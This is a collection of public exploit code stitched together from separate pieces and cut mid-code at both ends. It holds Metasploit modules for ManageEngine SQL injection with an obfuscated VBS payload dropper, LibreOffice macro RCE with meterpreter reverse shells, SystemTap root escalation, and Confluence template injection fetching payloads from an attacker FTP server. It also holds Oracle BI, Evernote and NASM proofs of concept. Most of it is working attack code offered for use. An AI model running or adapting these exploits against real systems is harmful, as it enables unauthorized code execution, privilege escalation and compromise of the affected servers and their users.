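    vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Descriptio'
    vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
    vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description'
    vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
    vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
    vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
    vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
    vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
    vbs_file << 'icrosoft-com:datatypes" & Chr(34) & " " & "dt:dt=" & Chr(34) & "bin.base64" & Chr(34)'
    vbs_file << ' & ">" & hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
    vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
    vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
    vbs_file << 'dMDdusgGha = "'
    vbs_file << "#{pb64}"
    vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
    vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
    vbs_file << '"\" & CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
    vbs_file << 'L & "\" & "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
    vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
    vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
    vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
    vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
    vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'

    ## encode the vbs file to base64 and then encode the url-hex
    encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')

    ## post preparation // creating and writing files on the server with SQLi
    vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
    vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
    vbs_payload << tfile
    vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"
    res = inject(vbs_payload)
    unless injected?(res)
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end
    print_good("The harmful .vbs file was successfully written to the server.")
    print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")

    exe
  end

  ##
  # Call functions
  ##
  def exploit
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    print_status("Payload is preparing...")
    get_payload
  end

  ##
  # Inj payload
  #
  # POSTs `payload` as the form body to Popup_SLA.jsp with a 25 second timeout
  # and returns the Rex response (nil when the request times out).
  ##
  def inject(payload)
    send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
      'data' => payload
    }, 25)
  end

  private

  ##
  # True when an injection response looks accepted: HTTP 200 and a JSESSIONID
  # cookie in the response.
  #
  # The original wrote `res.code = "200" && ...`, an assignment rather than a
  # comparison, so the status code was never checked (and Response#code is an
  # Integer, so even `== "200"` would never have matched). A nil response
  # (timeout) is treated as not injected instead of raising NoMethodError.
  ##
  def injected?(res)
    return false unless res && res.code == 200

    res.headers['set-cookie'].to_s.include?('JSESSIONID')
  end
end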
##
# The end of the adventure (o_O) // AkkuS
##
# Exploit Title: Code execution via path traversal
# Date: 17-04-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://evernote.com/
# Software Link: https://evernote.com/download
# Version: 7.9
# Tested on: macOS Mojave v10.14.4
# CVE: CVE-2019-10038
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-10038
# https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
Summary:
A local file path traversal issue exists in Evernote 7.9 for macOS which
allows an attacker to execute arbitrary programs.
Technical observation:
A crafted URI can be used in a note to perform this attack using file:///
as an argument or by traversing to any directory like
(../../../../something.app).
Since, Evernote also has a feature of sharing notes, in such case attacker
could leverage this vulnerability and send crafted notes (.enex) to the
victim to perform any further attack.
Patch:
The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
[MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.
# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2616 (7.2/10)
PoC:
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
">
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'LibreOffice Macro Code Execution',
      'Description' => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.
        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Alex Inführ', # Vulnerability discovery and PoC
        'Shelby Pace'  # Metasploit Module
      ],
      'References' => [
        [ 'CVE', '2018-16858' ],
        [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
      ],
      'Platform' => [ 'win', 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Targets' => [
        [
          'Windows',
          {
            'Platform' => 'win',
            'Arch' => [ ARCH_X86, ARCH_X64 ],
            'Payload' => 'windows/meterpreter/reverse_tcp',
            'DefaultOptions' => { 'PrependMigrate' => true }
          }
        ],
        [
          'Linux',
          {
            'Platform' => 'linux',
            'Arch' => [ ARCH_X86, ARCH_X64 ],
            'Payload' => 'linux/x86/meterpreter/reverse_tcp',
            'DefaultOptions' => { 'PrependFork' => true },
            'CmdStagerFlavor' => 'printf',
          }
        ]
      ],
      'DisclosureDate' => "Oct 18, 2018",
      'DefaultTarget' => 0
    ))
    register_options([
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
  end

  # Builds the Windows command line (a PowerShell stager carrying the encoded
  # payload) into @cmd; the trailing `&& echo` is kept from the original.
  def gen_windows_cmd
    psh_opts = { remove_comspec: true, method: 'reflection', encode_final_payload: true }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, psh_opts)
    @cmd << ' && echo'
  end

  # Builds the Linux command line (first line of the cmdstager) into @cmd.
  def gen_linux_cmd
    @cmd = "#{generate_cmdstager.first} && echo"
  end

  # Renders the ODT template for the given traversal path.
  #
  # The template is evaluated against this method's binding, so `path`,
  # `text_content` and `@cmd` are presumably read by it — keep those names
  # (TODO confirm against librefile.erb).
  # Raises via fail_with(Failure::NotFound) when the template file is missing.
  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)
    # file from Alex Inführ's PoC post referenced above
    template_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb')
    fodt_file = File.read(template_path)
    ERB.new(fodt_file).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  # Picks the command generator for the selected target, renders the
  # document and writes it out.
  def exploit
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    case datastore['TARGET']
    when 0 then gen_windows_cmd
    when 1 then gen_linux_cmd
    else fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    file_create(gen_file(path))
  end
end
# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588
PoC
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517
asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
PoC:
1. echo "equ push rax" > poc
2. nasm -f elf poc
insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
[...]
if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
/* there's a label here */
first = false;
result->label = tokval.t_charptr;
i = stdscan(NULL, &tokval);
if (i == ':') { /* skip over the optional colon */
i = stdscan(NULL, &tokval);
} else if (i == 0) {
nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
}
if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
/*
* FIXME: location.segment could be NO_SEG, in which case
* it is possible we should be passing 'absolute.segment'. Look into this.
* Work out whether that is *really* what we should be doing.
* Generally fix things. I think this is right as it is, but
* am still not certain.
*/
define_label(result->label,
in_absolute ? absolute.segment : location.segment,
location.offset, true);
[...]
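/*
 * Returns true when `l` names a local label: "@@..." in TASM-compatible
 * mode, or ".x" (a single leading dot) otherwise.
 *
 * The advisory above shows the parser reaching this function with
 * result->label still NULL ("equ" with no label), so a NULL argument is
 * rejected here instead of being dereferenced.
 */
static bool islocal(const char *l)
{
    if (!l)
        return false;
    if (tasm_compatible_mode) {
        if (l[0] == '@' && l[1] == '@')
            return true;
    }
    return (l[0] == '.' && l[1] != '.'); /* original crash site ("boom") */
}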
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
      'Description' => %q{
        This module attempts to gain root privileges by exploiting a
        vulnerability in the `staprun` executable included with SystemTap
        version 1.3.
        The `staprun` executable does not clear environment variables prior to
        executing `modprobe`, allowing an arbitrary configuration file to be
        specified in the `MODPROBE_OPTIONS` environment variable, resulting
        in arbitrary command execution with root privileges.
        This module has been tested successfully on:
        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Tavis Ormandy', # Discovery and exploit
        'bcoles'         # Metasploit
      ],
      'DisclosureDate' => '2010-11-17',
      'References' => [
        ['BID', '44914'],
        ['CVE', '2010-4170'],
        ['EDB', '15620'],
        ['URL', 'https://securitytracker.com/id?1024754'],
        ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
        ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
        ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
        ['URL', 'https://bugs.launchpad.net/bugs/677226'],
        ['URL', 'https://www.debian.org/security/2011/dsa-2348']
      ],
      'Platform' => ['linux'],
      'Arch' => [
        ARCH_X86,
        ARCH_X64,
        ARCH_ARMLE,
        ARCH_AARCH64,
        ARCH_PPC,
        ARCH_MIPSLE,
        ARCH_MIPSBE
      ],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Targets' => [['Auto', {}]],
      'DefaultTarget' => 0))
    register_options([
      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
    ])
    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
  end

  # Path of the staprun binary on the target (STAPRUN_PATH option).
  def staprun_path
    datastore['STAPRUN_PATH']
  end

  # Directory used for the dropped payload and modprobe config (WritableDir option).
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Writes `data` to `path` on the target (replacing any existing file) and
  # registers it for cleanup when the module finishes.
  def upload(path, data)
    print_status("Writing '#{path}' (#{data.size} bytes) ...")
    rm_f(path)
    write_file(path, data)
    register_file_for_cleanup(path)
  end

  # Same as #upload, then marks the file executable.
  def upload_and_chmodx(path, data)
    upload(path, data)
    chmod(path)
  end

  # Detected when staprun is both executable by this session and setuid;
  # Safe otherwise. Does not verify the SystemTap version.
  def check
    # On some systems, staprun execution is restricted to stapusr group:
    # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
    executable = cmd_exec("test -x '#{staprun_path}' && echo true").include?('true')
    unless executable
      vprint_error("#{staprun_path} is not executable")
      return CheckCode::Safe
    end
    vprint_good("#{staprun_path} is executable")

    unless setuid?(staprun_path)
      vprint_error("#{staprun_path} is not setuid")
      return CheckCode::Safe
    end
    vprint_good("#{staprun_path} is setuid")

    CheckCode::Detected
  end

  def exploit
    if check != CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
      end
      print_warning('Target does not appear to be vulnerable')
    end

    if is_root? && !datastore['ForceExploit']
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)

    # Hidden (dot-prefixed) random names for both dropped files.
    payload_name = ".#{rand_text_alphanumeric(10..15)}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx(payload_path, generate_payload_exe)

    config_path = "#{base_dir}/#{payload_name}.conf"
    upload(config_path, "install uprobes /bin/sh")

    print_status('Executing payload...')
    cmd = "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric(10..15)}"
    vprint_line(cmd_exec(cmd))
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::FtpServer
def initialize(info={})
  authors = [
    'Daniil Dmitriev',           # Discovering vulnerability
    'Dmitry (rrock) Shchannikov' # Metasploit module
  ]
  references = [
    [ 'CVE', '2019-3396' ],
    [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
    [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
    [ 'URL', 'https://paper.seebug.org/886/']
  ]
  # Java is the default target (index 0) because it is platform independent.
  targets = [
    [ 'Java',    { 'Platform' => 'java',  'Arch' => ARCH_JAVA }],
    [ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_X86 }],
    [ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
  ]

  super(update_info(info,
    'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
    'Description' => %q{
      Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
      allows embed online videos, slideshows, photostreams and more directly into page.
      A _template parameter can be used to inject remote Java code into a Velocity template,
      and gain code execution. Authentication is unrequired to exploit this vulnerability.
      By default, Java payload will be used because it is cross-platform, but you can also
      specify which native payload you want (Linux or Windows).
      Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
      6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
      This vulnerability was originally discovered by Daniil Dmitriev
      https://twitter.com/ddv_ua.
    },
    'License' => MSF_LICENSE,
    'Author' => authors,
    'References' => references,
    'Targets' => targets,
    'DefaultOptions' => {
      'RPORT' => 8090,
      'SRVPORT' => 8021,
    },
    'Privileged' => false,
    'DisclosureDate' => 'Mar 25 2019',
    'DefaultTarget' => 0,
    'Stance' => Msf::Exploit::Stance::Aggressive
  ))

  register_options([
    OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
    OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
                                 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
  ])
end
# Handles ftp RETR command.
#
# @param c [Socket] Control connection socket.
# @param arg [String] RETR argument.
# @return [void]
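def on_client_command_retr(c, arg)
  vprint_status("FTP download request for #{arg}")
  conn = establish_data_connection(c)
  unless conn
    c.put("425 Can't build data connection\r\n")
    return
  end
  c.put("150 Opening BINARY mode data connection for #{arg}\r\n")

  # Pick the Velocity template by the requested file name; anything else
  # gets the empty dummy template so the transfer still completes.
  template =
    case arg
    when /check\.vm$/    then get_check_vm
    when /javaprop\.vm$/ then get_javaprop_vm
    when /upload\.vm$/   then get_upload_vm
    when /exec\.vm$/     then get_exec_vm
    else get_dummy_vm
    end
  conn.put(wrap(template))
  c.put("226 Transfer complete.\r\n")
ensure
  # The original closed the data connection only on the happy path; an
  # exception while building or sending the template leaked the socket.
  conn.close if conn
end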
# Handles ftp PASS command to suppress output.
#
# @param c [Socket] Control connection socket.
# @param arg [String] PASS argument.
# @return [void]
def on_client_command_pass(c, arg)
  # Per-connection state kept by the FtpServer mixin; the password is only
  # echoed at verbose level and every login is accepted.
  session = @state[c]
  session[:pass] = arg
  vprint_status("#{session[:name]} LOGIN #{session[:user]} / #{session[:pass]}")
  c.put "230 Login OK\r\n"
end
# Handles ftp EPSV command to suppress output.
#
# @param c [Socket] Control connection socket.
# @param arg [String] EPSV argument.
# @return [void]
def on_client_command_epsv(c, arg)
  # Reject EPSV with a 500 (presumably so the client falls back to another
  # data-connection mode — confirm against the FtpServer mixin).
  reply = "500 'EPSV #{arg}': command not understood.\r\n"
  vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
  c.put(reply)
end
# Returns an upload template.
#
# @return [String]
def get_upload_vm
  # Velocity snippet that writes the base64 blob in @b64 to @fname on the
  # target via reflection; one line plus a trailing newline.
  "$i18n.getClass().forName('java.io.FileOutputStream')" \
    ".getConstructor($i18n.getClass().forName('java.lang.String'))" \
    ".newInstance('#{@fname}')" \
    ".write($i18n.getClass().forName('sun.misc.BASE64Decoder')" \
    ".getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n"
end
# Returns a command execution template.
#
# @return [String]
def get_exec_vm
  # Velocity snippet that runs @command through Runtime.exec and waits for it.
  "$i18n.getClass().forName('java.lang.Runtime')" \
    ".getMethod('getRuntime', null).invoke(null, null)" \
    ".exec('#{@command}').waitFor()\n"
end
# Returns checking template.
#
# @return [String]
def get_check_vm
  # The check marker is echoed back verbatim (plus newline) by the template engine.
  "#{@check_text}\n"
end
# Returns Java's getting property template.
#
# @return [String]
def get_javaprop_vm
  # Velocity snippet that evaluates System.getProperty(@prop).
  "$i18n.getClass().forName('java.lang.System')" \
    ".getMethod('getProperty', $i18n.getClass().forName('java.lang.String'))" \
    ".invoke(null, '#{@prop}').toString()\n"
end
# Returns dummy template.
#
# @return [String]
def get_dummy_vm
  # An empty heredoc evaluates to the empty string; served for any
  # unrecognised template name.
  ''
end
# Checks the vulnerability.
#
# @return [Array] Check code
def check
  # Start the FTP service that will serve the check template.
  print_status("Starting the FTP server.")
  start_service
  @check_text = Rex::Text.rand_text_alpha(5..10)
  res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
  # Vulnerable only if the random marker was rendered back into the response.
  echoed = res && res.body && res.body.include?(@check_text)
  echoed ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
rescue Msf::Exploit::Failed => e
  vprint_error(e.message)
  Exploit::CheckCode::Unknown
end
# Injects Java code to the template.
#
# @param service_url [String] Address of the template to inject.
# @return [void]
def inject_template(service_url, timeout=20)
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'headers' => {
'Accept' => '*/*',
'Origin' => full_uri(vhost_uri: true)
},
'ctype' => 'application/json; charset=UTF-8',
'data' => {
'contentId' => '1',
'macro' => {
'name' => 'widget',
'body' => '',
'params' => {
'url' => datastore['TRIGGERURL'],
'_template' => service_url
}
}
}.to_json
}, timeout=timeout)
unless res
unless service_url.include?("exec.vm")
print_warning('Connection timed out in #inject_template')
end
return
end
if res.body.include? 'widget-error'
print_error('Failed to inject and execute code:')
else
vprint_status("Server response:")
end
vprint_line(res.body)
res
end
# Reads a Java system property from the target by injecting the
# "javaprop" template and unwrapping the value from the response.
#
# @param prop [String] Name of the property to retrieve.
# @return [String, nil] The property value, '' when there was no response,
#   or nil when the response carried no wrapped value (see #clear_response).
def get_java_property(prop)
  @prop = prop
  template_url = "ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm"
  res = inject_template(template_url)
  return '' unless res && res.body
  clear_response(res.body)
end
# Returns the target platform as reported by the Java "os.name" property.
#
# @return [String, nil] See #get_java_property.
def get_target_platform
  get_java_property('os.name')
end
# Checks whether the detected OS matches one of the selected module target's
# platform names. A "java" target is accepted regardless of the OS.
#
# @param target_platform [String] OS name reported by the target.
# @return [TrueClass] Compatible
# @return [FalseClass] Not compatible
def target_platform_compat?(target_platform)
  target.platform.names.any? do |name|
    lowered = name.downcase
    lowered == 'java' || target_platform.downcase.include?(lowered)
  end
end
# Returns the remote temp directory from the Java "java.io.tmpdir" property.
#
# @return [String, nil] See #get_java_property.
def get_tmp_path
  get_java_property('java.io.tmpdir')
end
# Returns the Java home directory of the JVM running the target, taken from
# the "java.home" property.
#
# @return [String, nil] See #get_java_property.
def get_java_home_path
  get_java_property('java.home')
end
# Copies a file on the target by injecting the exec template with a
# platform-appropriate copy command.
#
# @note The purpose of this method is to have a file that is not busy, so we
#   can execute it. It is meant to be used with #get_write_file_code.
# @note The platform is guessed from the file name: an absolute POSIX-looking
#   path selects `cp`, anything else `cmd.exe /C copy`. Paths are not quoted.
#
# @param fname [String] The file to copy
# @param new_fname [String] The new file
# @return [Object, nil] Whatever #inject_template returns for the exec request.
def get_dup_file_code(fname, new_fname)
  unix_like = fname.match?(/^\/[[:print:]]+/)
  @command = if unix_like
               "cp #{fname} #{new_fname}"
             else
               "cmd.exe /C copy #{fname} #{new_fname}"
             end
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
end
# Joins the remote temp path and the payload file name using the path
# convention of the guessed platform.
#
# @param tmp_path [String] Remote temp directory.
# @param fname [String] Payload file name.
# @return [String] The normalized path.
def normalize_payload_fname(tmp_path, fname)
  # A quick way to check the platform instead of grabbing os.name from the
  # Java system properties: an absolute POSIX-looking path means Unix.
  return Rex::FileUtils.normalize_unix_path(tmp_path, fname) if /^\/[[:print:]]+/ =~ tmp_path
  Rex::FileUtils.normalize_win_path(tmp_path, fname)
end
# Exploits a Java target: uploads the payload JAR to the remote temp directory
# and runs it with the target's own JVM.
#
# @note The template helpers read instance variables: @fname and @b64 feed
#   #get_upload_vm, @command feeds #get_exec_vm. Each assignment below must
#   therefore precede the matching #inject_template call.
# @return [void]
def exploit_as_java
  tmp_path = get_tmp_path
  # fail_with is expected to raise (see the Msf::Exploit::Failed rescue in
  # #check), so a blank temp path does not reach the upload below.
  if tmp_path.blank?
    fail_with(Failure::Unknown, 'Unable to get the temp path.')
  end
  @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
  @b64 = Rex::Text.encode_base64(payload.encoded_jar)
  @command = ''
  java_home = get_java_home_path
  if java_home.blank?
    fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
  else
    vprint_status("Found Java home path: #{java_home}")
  end
  # Registered before the upload so the dropped file is cleaned up even if a
  # later step fails.
  register_files_for_cleanup(@fname)
  # Same path heuristic as #normalize_payload_fname: absolute POSIX path => Unix.
  if /^\/[[:print:]]+/ === @fname
    normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
    @command = %Q|#{normalized_java_path} -jar #{@fname}|
  else
    normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
    # Short (8.3) name, presumably to avoid the unquoted space in "Program Files".
    @fname.gsub!(/Program Files/, 'PROGRA~1')
    @command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
  end
  print_status("Attempting to upload #{@fname}")
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
  print_status("Attempting to execute #{@fname}")
  # The exec template calls waitFor() on the process, so a short timeout keeps
  # the module from hanging on the long-running payload.
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
# Exploits a Windows target: uploads a native payload executable to the
# remote temp directory, copies it to a second name and runs the copy.
#
# @note The copy exists so that the executed file is not the one the upload
#   may still hold open (see the note on #get_dup_file_code).
# @note @fname/@b64 feed #get_upload_vm and @command feeds #get_exec_vm via
#   instance variables, so assignment order matters.
# @return [void]
def exploit_as_windows
  tmp_path = get_tmp_path
  # fail_with is expected to raise, so a blank temp path stops here.
  if tmp_path.blank?
    fail_with(Failure::Unknown, 'Unable to get the temp path.')
  end
  @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
  @fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
  new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
  # Short (8.3) names, presumably to avoid the unquoted space in "Program Files".
  @fname.gsub!(/Program Files/, 'PROGRA~1')
  new_fname.gsub!(/Program Files/, 'PROGRA~1')
  # Both dropped files are registered for removal before anything is written.
  register_files_for_cleanup(@fname, new_fname)
  print_status("Attempting to upload #{@fname}")
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
  print_status("Attempting to copy payload to #{new_fname}")
  get_dup_file_code(@fname, new_fname)
  print_status("Attempting to execute #{new_fname}")
  @command = new_fname
  # Short timeout: the exec template waits for the process to exit.
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
# Exploits a Linux target: uploads a native payload to the remote temp
# directory, marks it executable, copies it to a second name and runs the copy.
#
# @note The copy exists so that the executed file is not the one the upload
#   may still hold open (see the note on #get_dup_file_code).
# @note @fname/@b64 feed #get_upload_vm and @command feeds #get_exec_vm via
#   instance variables, so assignment order matters.
# @return [void]
def exploit_as_linux
  tmp_path = get_tmp_path
  # fail_with is expected to raise, so a blank temp path stops here.
  if tmp_path.blank?
    fail_with(Failure::Unknown, 'Unable to get the temp path.')
  end
  @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
  @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
  new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
  # Both dropped files are registered for removal before anything is written.
  register_files_for_cleanup(@fname, new_fname)
  print_status("Attempting to upload #{@fname}")
